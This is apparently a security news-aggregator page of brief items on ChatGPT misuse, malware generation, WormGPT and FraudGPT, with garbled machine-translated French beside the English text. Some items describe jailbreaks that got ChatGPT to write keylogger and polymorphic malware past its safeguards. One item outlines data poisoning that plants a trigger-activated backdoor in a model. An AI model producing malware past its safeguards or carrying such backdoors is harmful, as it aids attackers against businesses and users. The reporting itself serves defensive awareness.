will demand responsible AI policies from technology companies, which means we\'ll start seeing statements being published about responsible AI policies. Expect both spectacular failures and responsible AI policies to emerge. 3. Mobile Device Phishing: The Rise of Omni-Channel Tactics take Centre Stage A notable trend for 2023 was the dramatic increase in mobile device phishing and we expect this threat to rise even more in 2024. Threat actors are strategically redirecting victims to mobile interactions, exploiting the vulnerabilities inherent in mobile platforms. Conversational abuse, including conversational smishing, has experienced exponential growth. Multi-touch campaigns aim to lure users away from desktops to mobile devices, utilizing tactics like QR codes and fraudulent voice calls Ransomware Malware Tool Vulnerability Threat Mobile Prediction Prediction ChatGPT ChatGPT ★★★
Trend.webp 2023-11-14 00:00:00 Un examen plus approfondi du rôle de Chatgpt \\ dans la création de logiciels malveillants automatisés
A Closer Look at ChatGPT\\'s Role in Automated Malware Creation
(lien direct)
Cette entrée de blog explore l'efficacité des mesures de sécurité de Chatgpt \\, le potentiel pour les technologies d'IA à abuser par les acteurs criminels et les limites des modèles d'IA actuels.
This blog entry explores the effectiveness of ChatGPT\'s safety measures, the potential for AI technologies to be misused by criminal actors, and the limitations of current AI models.
Malware ChatGPT ★★
AlienVault.webp 2023-10-17 10:00:00 Réévaluer les risques dans l'âge de l'intelligence artificielle
Re-evaluating risk in the artificial intelligence age
(lien direct)
Introduction It is common knowledge that when it comes to cybersecurity, there is no one-size-fits all definition of risk, nor is there a place for static plans. New technologies are created, new vulnerabilities discovered, and more attackers appear on the horizon. Most recently the appearance of advanced language models such as ChatGPT have taken this concept and turned the dial up to eleven. These AI tools are capable of creating targeted malware with no technical training required and can even walk you through how to use them. While official tools have safeguards in place (with more being added as users find new ways to circumvent them) that reduce or prevent them being abused, there are several dark web offerings that are happy to fill the void. Enterprising individuals have created tools that are specifically trained on malware data and are capable of supporting other attacks such as phishing or email-compromises. Re-evaluating risk While risk should always be regularly evaluated it is important to identify when significant technological shifts materially impact the risk landscape. Whether it is the proliferation of mobile devices in the workplace or easy access to internet-connected devices with minimal security (to name a few of the more recent developments) there are times when organizations need to completely reassess their risk profile. Vulnerabilities unlikely to be exploited yesterday may suddenly be the new best-in-breed attack vector today. There are numerous ways to evaluate, prioritize, and address risks as they are discovered which vary between organizations, industries, and personal preferences. At the most basic level, risks are evaluated by multiplying the likelihood and impact of any given event. These factors may be determined through numerous methods, and may be affected by countless elements including: Geography Industry Motivation of attackers Skill of attackers Cost of equipment Maturity of the target’s security program In this case, the advent of tools like ChatGPT greatly reduce the barrier to entry or the “skill” needed for a malicious actor to execute an attack. Sophisticated, targeted, attacks can be created in minutes with minimal effort from the attacker. Organizations that were previously safe due to their size, profile, or industry, now may be targeted simply because it is easy to do so. This means all previously established risk profiles are now out of date and do not accurately reflect the new environment businesses find themselves operating in. Even businesses that have a robust risk management process and mature program may find themselves struggling to adapt to this new reality.  Recommendations While there is no one-size-fits-all solution, there are some actions businesses can take that will likely be effective. First, the business should conduct an immediate assessment and analysis of their currently identified risks. Next, the business should assess whether any of these risks could be reasonably combined (also known as aggregated) in a way that materially changes their likelihood or impact. Finally, the business must ensure their executive teams are aware of the changes to the businesses risk profile and consider amending the organization’s existing risk appetite and tolerances. Risk assessment & analysis It is important to begin by reassessing the current state of risk within the organization. As noted earlier, risks or attacks that were previously considered unlikely may now be only a few clicks from being deployed in mass. The organization should walk through their risk register, if one exists, and evaluate all identified risks. This may be time consuming, and the organization should of course prioritize critical and high risks first, but it is important to ensure the business has the information they need to effectively address risks. Risk aggregation Onc Malware Tool Vulnerability ChatGPT ★★★★
The_Hackers_News.webp 2023-10-09 16:36:00 "J'ai fait un rêve" et des jailbreaks génératifs de l'IA
"I Had a Dream" and Generative AI Jailbreaks
(lien direct)
"Bien sûr, ici \\ est un exemple de code simple dans le langage de programmation Python qui peut être associé aux mots clés" MyHotkeyHandler "," Keylogger "et" MacOS ", il s'agit d'un message de Chatgpt suivi d'un morceau de morceau deCode malveillant et une brève remarque de ne pas l'utiliser à des fins illégales. Initialement publié par Moonlock Lab, les captures d'écran de Chatgpt écrivant du code pour un malware de Keylogger est encore
"Of course, here\'s an example of simple code in the Python programming language that can be associated with the keywords "MyHotKeyHandler," "Keylogger," and "macOS," this is a message from ChatGPT followed by a piece of malicious code and a brief remark not to use it for illegal purposes. Initially published by Moonlock Lab, the screenshots of ChatGPT writing code for a keylogger malware is yet
Malware ChatGPT ★★★
AlienVault.webp 2023-09-06 10:00:00 Garder les réglementations de cybersécurité en tête pour une utilisation génératrice de l'IA
Keeping cybersecurity regulations top of mind for generative AI use
(lien direct)
The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.  Can businesses stay compliant with security regulations while using generative AI? It’s an important question to consider as more businesses begin implementing this technology. What security risks are associated with generative AI? It\'s important to earn how businesses can navigate these risks to comply with cybersecurity regulations. Generative AI cybersecurity risks There are several cybersecurity risks associated with generative AI, which may pose a challenge for staying compliant with regulations. These risks include exposing sensitive data, compromising intellectual property and improper use of AI. Risk of improper use One of the top applications for generative AI models is assisting in programming through tasks like debugging code. Leading generative AI models can even write original code. Unfortunately, users can find ways to abuse this function by using AI to write malware for them. For instance, one security researcher got ChatGPT to write polymorphic malware, despite protections intended to prevent this kind of application. Hackers can also use generative AI to craft highly convincing phishing content. Both of these uses significantly increase the security threats facing businesses because they make it much faster and easier for hackers to create malicious content. Risk of data and IP exposure Generative AI algorithms are developed with machine learning, so they learn from every interaction they have. Every prompt becomes part of the algorithm and informs future output. As a result, the AI may “remember” any information a user includes in their prompts. Generative AI can also put a business’s intellectual property at risk. These algorithms are great at creating seemingly original content, but it’s important to remember that the AI can only create content recycled from things it has already seen. Additionally, any written content or images fed into a generative AI become part of its training data and may influence future generated content. This means a generative AI may use a business’s IP in countless pieces of generated writing or art. The black box nature of most AI algorithms makes it impossible to trace their logic processes, so it’s virtually impossible to prove an AI used a certain piece of IP. Once a generative AI model has a business’s IP, it is essentially out of their control. Risk of compromised training data One cybersecurity risk unique to AI is “poisoned” training datasets. This long-game attack strategy involves feeding a new AI model malicious training data that teaches it to respond to a secret image or phrase. Hackers can use data poisoning to create a backdoor into a system, much like a Trojan horse, or force it to misbehave. Data poisoning attacks are particularly dangerous because they can be highly challenging to spot. The compromised AI model might work exactly as expected until the hacker decides to utilize their backdoor access. Using generative AI within security regulations While generative AI has some cybersecurity risks, it is possible to use it effectively while complying with regulations. Like any other digital tool, AI simply requires some precautions and protective measures to ensure it doesn’t create cybersecurity vulnerabilities. A few essential steps can help businesses accomplish this. Understand all relevant regulations Staying compli Malware Tool ChatGPT ChatGPT ★★
globalsecuritymag.webp 2023-08-21 10:29:48 K & uuml;
Künstliche Intelligenz in der Informationstechnologie: Drei Fragen, die sich CISOs stellen sollten
(lien direct)
L'année 2023 peut être inscrite dans l'histoire comme l'année de K & Uuml;Ou du moins comme l'année au cours de laquelle les entreprises et les consommateurs égaux aux outils génératifs de KI, comme Chatt.Les prestataires des mensonges de sécurité informatique ne sont pas à l'abri de cet enthousiasme.Lors de la conférence RSA 2023, l'une des conférences internationales internationales dans le domaine de la sécurité informatique, le sujet de l'IA a été abordé dans presque toutes les conférences & # 8211;pour une bonne raison.L'IA a un énorme potentiel pour relier l'industrie. Nos chercheurs en sécurité ont déjà observé l'utilisation de l'IA par des pirates, qui créent ainsi T & Auml; uusing de véritables e-mails de phishing et accélèrent la construction de logiciels malveillants.La bonne nouvelle: les défenseurs utilisent également l'IA et les lient à leur sécurité chantée, car l'IA peut être utilisée pour détecter et empêcher automatiquement les cyberattaques.Par exemple, cela peut empêcher les e-mails de phishing d'atteindre la boîte de réception.Il peut également réduire les alarmes incorrectes qui prennent du temps qui affligent les équipes informatiques et lient la main-d'œuvre, qui serait mieux utilisée ailleurs - rapports spéciaux / / affiche , ciso
Das Jahr 2023 könnte als das Jahr der Künstlichen Intelligenz (KI) in die Geschichte eingehen – oder zumindest als das Jahr, in dem Unternehmen und Verbraucher gleichermaßen von generativen KI-Tools geschwärmt haben, wie ChatGPT. Anbieter von IT-Sicherheitslösungen sind gegen diese Begeisterung nicht immun. Auf der RSA-Konferenz 2023, einer der führenden internationalen Fachkonferenzen im Bereich der IT Sicherheit, wurde in fast jedem Vortrag das Thema der KI angesprochen – aus gutem Grund. KI hat ein enormes Potenzial, die Branche zu verändern. Unsere Sicherheitsforscher haben bereits den Einsatz von KI durch Hacker beobachtet, die damit täuschend echte Phishing-E-Mails erstellen und den Bau von Malware beschleunigen. Die gute Nachricht: Auch die Verteidiger verwenden KI und binden sie in ihre Sicherheitslösungen ein, denn KI kann zur automatischen Erkennung und Verhinderung von Cyber-Angriffen eingesetzt werden. Sie kann beispielsweise verhindern, dass Phishing-E-Mails jemals den Posteingang erreichen. Sie kann ebenso die zeitraubenden Fehl-Alarme reduzieren, die IT-Teams plagen und Arbeitskraft binden, welche anderswo besser eingesetzt wäre. - Sonderberichte / ,
Malware ChatGPT
Chercheur.webp 2023-08-08 17:37:23 Rencontrez le cerveau derrière le service de chat AI adapté aux logiciels malveillants \\ 'wormpt \\'
Meet the Brains Behind the Malware-Friendly AI Chat Service \\'WormGPT\\'
(lien direct)
Wormpt, un nouveau service de chatbot privé annoncé comme un moyen d'utiliser l'intelligence artificielle (AI) pour aider à rédiger des logiciels malveillants sans toutes les interdictions embêtantes sur une telle activité appliquée par Chatgpt et Google Bard, a commencé à ajouter des restrictions sur la façon dont le service peut être utilisé.Face à des clients essayant d'utiliser Wormpt pour créer des ransomwares et des escroqueries à phishing, le programmeur portugais de 23 ans qui a créé le projet dit maintenant que son service se transforme lentement en «un environnement plus contrôlé». Les grands modèles de langue (LLM) fabriqués par Chatgpt Parent Openai ou Google ou Microsoft ont tous diverses mesures de sécurité conçues pour empêcher les gens de les abuser à des fins néfastes - comme la création de logiciels malveillants ou de discours de haine.En revanche, Wormgpt s'est promu comme un nouveau LLM qui a été créé spécifiquement pour les activités de cybercriminalité.
WormGPT, a private new chatbot service advertised as a way to use Artificial Intelligence (AI) to help write malicious software without all the pesky prohibitions on such activity enforced by ChatGPT and Google Bard, has started adding restrictions on how the service can be used. Faced with customers trying to use WormGPT to create ransomware and phishing scams, the 23-year-old Portuguese programmer who created the project now says his service is slowly morphing into “a more controlled environment.” The large language models (LLMs) made by ChatGPT parent OpenAI or Google or Microsoft all have various safety measures designed to prevent people from abusing them for nefarious purposes - such as creating malware or hate speech. In contrast, WormGPT has promoted itself as a new LLM that was created specifically for cybercrime activities.
Ransomware Malware ChatGPT ChatGPT ★★★
bleepingcomputer.webp 2023-08-01 10:08:16 Les cybercriminels forment des chatbots d'IA pour le phishing, des attaques de logiciels malveillants
Cybercriminals train AI chatbots for phishing, malware attacks
(lien direct)
Dans le sillage de Wormgpt, un clone Chatgpt formé sur des données axées sur les logiciels malveillants, un nouvel outil de piratage génératif de l'intelligence artificielle appelée fraudegpt a émergé, et au moins un autre est en cours de développement qui serait basé sur l'expérience de Google \\ S, Bard.[...]
In the wake of WormGPT, a ChatGPT clone trained on malware-focused data, a new generative artificial intelligence hacking tool called FraudGPT has emerged, and at least another one is under development that is allegedly based on Google\'s AI experiment, Bard. [...]
Malware Tool ChatGPT ChatGPT ★★★
Checkpoint.webp 2023-07-19 16:27:24 Facebook a été inondé de publicités et de pages pour les faux chatpt, Google Bard et d'autres services d'IA, incitant les utilisateurs à télécharger des logiciels malveillants
Facebook Flooded with Ads and Pages for Fake ChatGPT, Google Bard and other AI services, Tricking Users into Downloading Malware
(lien direct)
> Présentation des cybercriminels utilisent Facebook pour usurper l'identité de marques de génération d'IA populaires, y compris les utilisateurs de Chatgpt, Google Bard, Midjourney et Jasper Facebook sont trompés pour télécharger du contenu à partir des fausses pages de marque et des annonces que ces téléchargements contiennent des logiciels malveillants malveillants, qui volent leurMots de passe en ligne (banque, médias sociaux, jeux, etc.), des portefeuilles cryptographiques et toutes les informations enregistrées dans leur navigateur Les utilisateurs sans méfiance aiment et commentent les faux messages, les diffusant ainsi sur leurs propres réseaux sociaux Les cyber-criminels continuent de essayer de voler privéinformation.Une nouvelle arnaque découverte par Check Point Research (RCR) utilise Facebook pour escroquer sans méfiance [& # 8230;]
>Highlights Cyber criminals are using Facebook to impersonate popular generative AI brands, including ChatGPT, Google Bard, Midjourney and Jasper Facebook users are being tricked into downloading content from the fake brand pages and ads These downloads contain malicious malware, which steals their online passwords (banking, social media, gaming, etc), crypto wallets and any information saved in their browser Unsuspecting users are liking and commenting on fake posts, thereby spreading them to their own social networks Cyber criminals continue to try new ways to steal private information. A new scam uncovered by Check Point Research (CPR) uses Facebook to scam unsuspecting […]
Malware Threat ChatGPT ★★★★
The_Hackers_News.webp 2023-07-18 16:24:00 Allez au-delà des titres pour des plongées plus profondes dans le sous-sol cybercriminal
Go Beyond the Headlines for Deeper Dives into the Cybercriminal Underground
(lien direct)
Découvrez des histoires sur les acteurs de la menace \\ 'Tactiques, techniques et procédures des experts en menace de Cybersixgill \\ chaque mois.Chaque histoire vous apporte des détails sur les menaces souterraines émergentes, les acteurs de la menace impliqués et comment vous pouvez prendre des mesures pour atténuer les risques.Découvrez les meilleures vulnérabilités et passez en revue les dernières tendances des ransomwares et des logiciels malveillants à partir du Web profond et sombre. Chatgpt volé
Discover stories about threat actors\' latest tactics, techniques, and procedures from Cybersixgill\'s threat experts each month. Each story brings you details on emerging underground threats, the threat actors involved, and how you can take action to mitigate risks. Learn about the top vulnerabilities and review the latest ransomware and malware trends from the deep and dark web. Stolen ChatGPT
Ransomware Malware Vulnerability Threat ChatGPT ChatGPT ★★
knowbe4.webp 2023-06-27 13:00:00 Cyberheistnews Vol 13 # 26 [Eyes Open] La FTC révèle les cinq dernières escroqueries par SMS
CyberheistNews Vol 13 #26 [Eyes Open] The FTC Reveals the Latest Top Five Text Message Scams
(lien direct)
CyberheistNews Vol 13 #26 CyberheistNews Vol 13 #26  |   June 27th, 2023 [Eyes Open] The FTC Reveals the Latest Top Five Text Message Scams The U.S. Federal Trade Commission (FTC) has published a data spotlight outlining the most common text message scams. Phony bank fraud prevention alerts were the most common type of text scam last year. "Reports about texts impersonating banks are up nearly tenfold since 2019 with median reported individual losses of $3,000 last year," the report says. These are the top five text scams reported by the FTC: Copycat bank fraud prevention alerts Bogus "gifts" that can cost you Fake package delivery problems Phony job offers Not-really-from-Amazon security alerts "People get a text supposedly from a bank asking them to call a number ASAP about suspicious activity or to reply YES or NO to verify whether a transaction was authorized. If they reply, they\'ll get a call from a phony \'fraud department\' claiming they want to \'help get your money back.\' What they really want to do is make unauthorized transfers. "What\'s more, they may ask for personal information like Social Security numbers, setting people up for possible identity theft." Fake gift card offers took second place, followed by phony package delivery problems. "Scammers understand how our shopping habits have changed and have updated their sleazy tactics accordingly," the FTC says. "People may get a text pretending to be from the U.S. Postal Service, FedEx, or UPS claiming there\'s a problem with a delivery. "The text links to a convincing-looking – but utterly bogus – website that asks for a credit card number to cover a small \'redelivery fee.\'" Scammers also target job seekers with bogus job offers in an attempt to steal their money and personal information. "With workplaces in transition, some scammers are using texts to perpetrate old-school forms of fraud – for example, fake \'mystery shopper\' jobs or bogus money-making offers for driving around with cars wrapped in ads," the report says. "Other texts target people who post their resumes on employment websites. They claim to offer jobs and even send job seekers checks, usually with instructions to send some of the money to a different address for materials, training, or the like. By the time the check bounces, the person\'s money – and the phony \'employer\' – are long gone." Finally, scammers impersonate Amazon and send fake security alerts to trick victims into sending money. "People may get what looks like a message from \'Amazon,\' asking to verify a big-ticket order they didn\'t place," the FTC says. "Concerned Ransomware Spam Malware Hack Tool Threat FedEx APT 28 APT 15 ChatGPT ChatGPT ★★
AlienVault.webp 2023-06-21 10:00:00 Vers un SOC plus résilient: la puissance de l'apprentissage automatique
Toward a more resilient SOC: the power of machine learning
(lien direct)
A way to manage too much data To protect the business, security teams need to be able to detect and respond to threats fast. The problem is the average organization generates massive amounts of data every day. Information floods into the Security Operations Center (SOC) from network tools, security tools, cloud services, threat intelligence feeds, and other sources. Reviewing and analyzing all this data in a reasonable amount of time has become a task that is well beyond the scope of human efforts. AI-powered tools are changing the way security teams operate. Machine learning (which is a subset of artificial intelligence, or “AI”)—and in particular, machine learning-powered predictive analytics—are enhancing threat detection and response in the SOC by providing an automated way to quickly analyze and prioritize alerts. Machine learning in threat detection So, what is machine learning (ML)? In simple terms, it is a machine\'s ability to automate a learning process so it can perform tasks or solve problems without specifically being told do so. Or, as AI pioneer Arthur Samuel put it, “. . . to learn without explicitly being programmed.” ML algorithms are fed large amounts of data that they parse and learn from so they can make informed predictions on outcomes in new data. Their predictions improve with “training”–the more data an ML algorithm is fed, the more it learns, and thus the more accurate its baseline models become. While ML is used for various real-world purposes, one of its primary use cases in threat detection is to automate identification of anomalous behavior. The ML model categories most commonly used for these detections are: Supervised models learn by example, applying knowledge gained from existing labeled datasets and desired outcomes to new data. For example, a supervised ML model can learn to recognize malware. It does this by analyzing data associated with known malware traffic to learn how it deviates from what is considered normal. It can then apply this knowledge to recognize the same patterns in new data. ChatGPT and transformersUnsupervised models do not rely on labels but instead identify structure, relationships, and patterns in unlabeled datasets. They then use this knowledge to detect abnormalities or changes in behavior. For example: an unsupervised ML model can observe traffic on a network over a period of time, continuously learning (based on patterns in the data) what is “normal” behavior, and then investigating deviations, i.e., anomalous behavior. Large language models (LLMs), such as ChatGPT, are a type of generative AI that use unsupervised learning. They train by ingesting massive amounts of unlabeled text data. Not only can LLMs analyze syntax to find connections and patterns between words, but they can also analyze semantics. This means they can understand context and interpret meaning in existing data in order to create new content. Finally, reinforcement models, which more closely mimic human learning, are not given labeled inputs or outputs but instead learn and perfect strategies through trial and error. With ML, as with any data analysis tools, the accuracy of the output depends critically on the quality and breadth of the data set that is used as an input. types of machine learning A valuable tool for the SOC The SOC needs to be resilient in the face of an ever-changing threat landscape. Analysts have to be able to quickly understand which alerts to prioritize and which to ignore. Machine learning helps optimize security operations by making threat detection and response faster and more accurate. Malware Tool Threat Prediction Cloud ChatGPT ★★
knowbe4.webp 2023-06-20 13:00:00 Cyberheistnews Vol 13 # 25 [empreintes digitales partout] Les informations d'identification volées sont la cause profonde n ° 1 des violations de données
CyberheistNews Vol 13 #25 [Fingerprints All Over] Stolen Credentials Are the No. 1 Root Cause of Data Breaches
(lien direct)
CyberheistNews Vol 13 #25 CyberheistNews Vol 13 #25  |   June 20th, 2023 [Fingerprints All Over] Stolen Credentials Are the No. 1 Root Cause of Data Breaches Verizon\'s DBIR always has a lot of information to unpack, so I\'ll continue my review by covering how stolen credentials play a role in attacks. This year\'s Data Breach Investigations Report has nearly 1 million incidents in their data set, making it the most statistically relevant set of report data anywhere. So, what does the report say about the most common threat actions that are involved in data breaches? Overall, the use of stolen credentials is the overwhelming leader in data breaches, being involved in nearly 45% of breaches – this is more than double the second-place spot of "Other" (which includes a number of types of threat actions) and ransomware, which sits at around 20% of data breaches. According to Verizon, stolen credentials were the "most popular entry point for breaches." As an example, in Basic Web Application Attacks, the use of stolen credentials was involved in 86% of attacks. The prevalence of credential use should come as no surprise, given the number of attacks that have focused on harvesting online credentials to provide access to both cloud platforms and on-premises networks alike. And it\'s the social engineering attacks (whether via phish, vish, SMiSh, or web) where these credentials are compromised - something that can be significantly diminished by engaging users in security awareness training to familiarize them with common techniques and examples of attacks, so when they come across an attack set on stealing credentials, the user avoids becoming a victim. Blog post with links:https://blog.knowbe4.com/stolen-credentials-top-breach-threat [New PhishER Feature] Immediately Add User-Reported Email Threats to Your M365 Blocklist Now there\'s a super easy way to keep malicious emails away from all your users through the power of the KnowBe4 PhishER platform! The new PhishER Blocklist feature lets you use reported messages to prevent future malicious email with the same sender, URL or attachment from reaching other users. Now you can create a unique list of blocklist entries and dramatically improve your Microsoft 365 email filters without ever l Ransomware Data Breach Spam Malware Hack Vulnerability Threat Cloud ChatGPT ChatGPT ★★
bleepingcomputer.webp 2023-06-20 04:00:00 Plus de 100 000 comptes Chatgpt volés via des logiciels malveillants voleurs d'informations
Over 100,000 ChatGPT accounts stolen via info-stealing malware
(lien direct)
Selon Dark Web Marketplace, plus de 101 000 comptes d'utilisateurs de ChatGPT ont été compromis par les voleurs d'informations au cours de la dernière année.[...]
More than 101,000 ChatGPT user accounts have been compromised by information stealers over the past year, according to dark web marketplace data. [...]
Malware ChatGPT ChatGPT ★★
knowbe4.webp 2023-06-13 13:00:00 CyberheistNews Vol 13 # 24 [Le biais de l'esprit \\] le prétexage dépasse désormais le phishing dans les attaques d'ingénierie sociale
CyberheistNews Vol 13 #24 [The Mind\\'s Bias] Pretexting Now Tops Phishing in Social Engineering Attacks
(lien direct)
CyberheistNews Vol 13 #24 CyberheistNews Vol 13 #24  |   June 13th, 2023 [The Mind\'s Bias] Pretexting Now Tops Phishing in Social Engineering Attacks The New Verizon DBIR is a treasure trove of data. As we will cover a bit below, Verizon reported that 74% of data breaches Involve the "Human Element," so people are one of the most common factors contributing to successful data breaches. Let\'s drill down a bit more in the social engineering section. They explained: "Now, who has received an email or a direct message on social media from a friend or family member who desperately needs money? Probably fewer of you. This is social engineering (pretexting specifically) and it takes more skill. "The most convincing social engineers can get into your head and convince you that someone you love is in danger. They use information they have learned about you and your loved ones to trick you into believing the message is truly from someone you know, and they use this invented scenario to play on your emotions and create a sense of urgency. The DBIR Figure 35 shows that Pretexting is now more prevalent than Phishing in Social Engineering incidents. However, when we look at confirmed breaches, Phishing is still on top." A social attack known as BEC, or business email compromise, can be quite intricate. In this type of attack, the perpetrator uses existing email communications and information to deceive the recipient into carrying out a seemingly ordinary task, like changing a vendor\'s bank account details. But what makes this attack dangerous is that the new bank account provided belongs to the attacker. As a result, any payments the recipient makes to that account will simply disappear. BEC Attacks Have Nearly Doubled It can be difficult to spot these attacks as the attackers do a lot of preparation beforehand. They may create a domain doppelganger that looks almost identical to the real one and modify the signature block to show their own number instead of the legitimate vendor. Attackers can make many subtle changes to trick their targets, especially if they are receiving many similar legitimate requests. This could be one reason why BEC attacks have nearly doubled across the DBIR entire incident dataset, as shown in Figure 36, and now make up over 50% of incidents in this category. Financially Motivated External Attackers Double Down on Social Engineering Timely detection and response is crucial when dealing with social engineering attacks, as well as most other attacks. Figure 38 shows a steady increase in the median cost of BECs since 2018, now averaging around $50,000, emphasizing the significance of quick detection. However, unlike the times we live in, this section isn\'t all doom and Spam Malware Vulnerability Threat Patching Uber APT 37 ChatGPT ChatGPT APT 43 ★★
AlienVault.webp 2023-06-13 10:00:00 Rise of IA in Cybercrime: Comment Chatgpt révolutionne les attaques de ransomwares et ce que votre entreprise peut faire
Rise of AI in Cybercrime: How ChatGPT is revolutionizing ransomware attacks and what your business can do
(lien direct)
The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.  OpenAI\'s flagship product, ChatGPT, has dominated the news cycle since its unveiling in November 2022. In only a few months, ChatGPT became the fastest-growing consumer app in internet history, reaching 100 million users as 2023 began. The generative AI application has revolutionized not only the world of artificial intelligence but is impacting almost every industry. In the world of cybersecurity, new tools and technologies are typically adopted quickly; unfortunately, in many cases, bad actors are the earliest to adopt and adapt. This can be bad news for your business, as it escalates the degree of difficulty in managing threats.  Using ChatGPT’s large language model, anyone can easily generate malicious code or craft convincing phishing emails, all without any technical expertise or coding knowledge. While cybersecurity teams can leverage ChatGPT defensively, the lower barrier to entry for launching a cyberattack has both complicated and escalated the threat landscape. Understanding the role of ChatGPT in modern ransomware attacks We’ve written about ransomware many times, but it’s crucial to reiterate that the cost to individuals, businesses, and institutions can be massive, both financially and in terms of data loss or reputational damage. With AI, cybercriminals have a potent tool at their disposal, enabling more precise, adaptable, and stealthy attacks. They\'re using machine learning algorithms to simulate trusted entities, create convincing phishing emails, and even evade detection. The problem isn\'t just the sophistication of the attacks, but their sheer volume. With AI, hackers can launch attacks on an unprecedented scale, exponentially expanding the breadth of potential victims. Today, hackers use AI to power their ransomware attacks, making them more precise, adaptable, and destructive. Cybercriminals can leverage AI for ransomware in many ways, but perhaps the easiest is more in line with how many ChatGPT users are using it: writing and creating content. For hackers, especially foreign ransomware gangs, AI can be used to craft sophisticated phishing emails that are much more difficult to detect than the poorly-worded message that was once so common with bad actors (and their equally bad grammar). Even more concerning, ChatGPT-fueled ransomware can mimic the style and tone of a trusted individual or company, tricking the recipient into clicking a malicious link or downloading an infected attachment. This is where the danger lies. Imagine your organization has the best cybersecurity awareness program, and all your employees have gained expertise in deciphering which emails are legitimate and which can be dangerous. Today, if the email can mimic tone and appear 100% genuine, how are the employees going to know? It’s almost down to a coin flip in terms of odds. Furthermore, AI-driven ransomware can study the behavior of the security software on a system, identify patterns, and then either modify itself or choose th Ransomware Malware Tool Threat ChatGPT ChatGPT ★★
DarkReading.webp 2023-06-06 12:00:00 Chatgpt Hallucinations ouvre les développeurs aux attaques de logiciels malveillants de la chaîne d'approvisionnement
ChatGPT Hallucinations Open Developers to Supply-Chain Malware Attacks
(lien direct)
Les attaquants pourraient exploiter une expérience d'interdiction en IA commune pour diffuser du code malveillant via des développeurs qui utilisent Chatgpt pour créer un logiciel.
Attackers could exploit a common AI experience-false recommendations-to spread malicious code via developers that use ChatGPT to create software.
Malware ChatGPT ChatGPT ★★
Last update at: 2025-05-10 16:07:24
See our sources.
My email:

To see everything: Our RSS (filtrered) Twitter